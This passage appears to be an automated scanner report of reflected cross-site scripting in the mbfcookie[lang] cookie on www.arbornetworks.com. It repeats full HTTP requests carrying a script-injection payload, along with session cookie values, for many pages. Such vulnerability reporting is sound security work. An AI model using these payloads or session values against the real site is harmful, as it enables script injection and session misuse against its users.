Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-security-research-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enfba46"><script>alert(1)</script>e9a751b4cd1; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b951"><script>alert(1)</script>d5453ad5523 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6b951\"><script>alert(1)</script>d5453ad5523 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-security-visibility-products-235.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en6b951"><script>alert(1)</script>d5453ad5523; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a99e4"><script>alert(1)</script>5e86c72a29f was submitted in the mbfcookie[lang] cookie. This input was echoed as a99e4\"><script>alert(1)</script>5e86c72a29f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-solutions-we-provide.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ena99e4"><script>alert(1)</script>5e86c72a29f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ceac"><script>alert(1)</script>63f3f812b9a was submitted in the mbfcookie[lang] cookie. This input was echoed as 9ceac\"><script>alert(1)</script>63f3f812b9a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/news-events.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en9ceac"><script>alert(1)</script>63f3f812b9a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb73d"><script>alert(1)</script>c71247202a3 was submitted in the mbfcookie[lang] cookie. This input was echoed as bb73d\"><script>alert(1)</script>c71247202a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/partnership-inquiry-form.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enbb73d"><script>alert(1)</script>c71247202a3; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b712"><script>alert(1)</script>d3b5d470576 was submitted in the mbfcookie[lang] cookie. This input was echoed as 1b712\"><script>alert(1)</script>d3b5d470576 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/services-network-support-maintenance-training-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en1b712"><script>alert(1)</script>d3b5d470576; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c1e4"><script>alert(1)</script>7b05d39a8bb was submitted in the mbfcookie[lang] cookie. This input was echoed as 4c1e4\"><script>alert(1)</script>7b05d39a8bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/solution-partners-4.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en4c1e4"><script>alert(1)</script>7b05d39a8bb; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5446"><script>alert(1)</script>29761611793 was submitted in the mbfcookie[lang] cookie. This input was echoed as f5446\"><script>alert(1)</script>29761611793 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/solutions-for-places-in-your-network.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enf5446"><script>alert(1)</script>29761611793; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64ac0"><script>alert(1)</script>6ebae96397e was submitted in the mbfcookie[lang] cookie. This input was echoed as 64ac0\"><script>alert(1)</script>6ebae96397e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/solutions-for-your-business-needs.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en64ac0"><script>alert(1)</script>6ebae96397e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53001"><script>alert(1)</script>055958a227a was submitted in the mbfcookie[lang] cookie. This input was echoed as 53001\"><script>alert(1)</script>055958a227a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/technology-partners-4.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en53001"><script>alert(1)</script>055958a227a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 710ca"><script>alert(1)</script>808460338d8 was submitted in the mbfcookie[lang] cookie. This input was echoed as 710ca\"><script>alert(1)</script>808460338d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/what-we-do-network-security-solutions-services.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en710ca"><script>alert(1)</script>808460338d8; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f28af"><script>alert(1)</script>be53bf7bfc was submitted in the mbfcookie[lang] cookie. This input was echoed as f28af\"><script>alert(1)</script>be53bf7bfc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/white-papers-global-network-security-topics-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enf28af"><script>alert(1)</script>be53bf7bfc; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7374"><script>alert(1)</script>b64724bdb0 was submitted in the mbfcookie[lang] cookie. This input was echoed as e7374\"><script>alert(1)</script>b64724bdb0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /es/5.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ene7374"><script>alert(1)</script>b64724bdb0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e33d8"><script>alert(1)</script>9427a0c6b34 was submitted in the mbfcookie[lang] cookie. This input was echoed as e33d8\"><script>alert(1)</script>9427a0c6b34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /es/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ene33d8"><script>alert(1)</script>9427a0c6b34; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7922b"><script>alert(1)</script>692436b615a was submitted in the mbfcookie[lang] cookie. This input was echoed as 7922b\"><script>alert(1)</script>692436b615a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /fr/4.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en7922b"><script>alert(1)</script>692436b615a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48fef"><script>alert(1)</script>d8a50681f6d was submitted in the mbfcookie[lang] cookie. This input was echoed as 48fef\"><script>alert(1)</script>d8a50681f6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /fr/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en48fef"><script>alert(1)</script>d8a50681f6d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51c78"><script>alert(1)</script>04e4fe7d485 was submitted in the mbfcookie[lang] cookie. This input was echoed as 51c78\"><script>alert(1)</script>04e4fe7d485 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.php HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en51c78"><script>alert(1)</script>04e4fe7d485; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd6b5"><script>alert(1)</script>22edd466f97 was submitted in the mbfcookie[lang] cookie. This input was echoed as bd6b5\"><script>alert(1)</script>22edd466f97 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /it HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enbd6b5"><script>alert(1)</script>22edd466f97; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b884f"><script>alert(1)</script>27d3dcaf1dc was submitted in the mbfcookie[lang] cookie. This input was echoed as b884f\"><script>alert(1)</script>27d3dcaf1dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /it/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enb884f"><script>alert(1)</script>27d3dcaf1dc; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8184b"><script>alert(1)</script>1699682b65d was submitted in the mbfcookie[lang] cookie. This input was echoed as 8184b\"><script>alert(1)</script>1699682b65d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /jp/2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en8184b"><script>alert(1)</script>1699682b65d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4a5f"><script>alert(1)</script>be89fa02b90 was submitted in the mbfcookie[lang] cookie. This input was echoed as e4a5f\"><script>alert(1)</script>be89fa02b90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /jp/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ene4a5f"><script>alert(1)</script>be89fa02b90; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad6f9"><script>alert(1)</script>0bc779789b was submitted in the mbfcookie[lang] cookie. This input was echoed as ad6f9\"><script>alert(1)</script>0bc779789b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /kr/2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enad6f9"><script>alert(1)</script>0bc779789b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e2d6"><script>alert(1)</script>e91882c8043 was submitted in the mbfcookie[lang] cookie. This input was echoed as 4e2d6\"><script>alert(1)</script>e91882c8043 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /kr/network-infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en4e2d6"><script>alert(1)</script>e91882c8043; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac374"><script>alert(1)</script>5a50e0c21ab was submitted in the mbfcookie[lang] cookie. This input was echoed as ac374\"><script>alert(1)</script>5a50e0c21ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
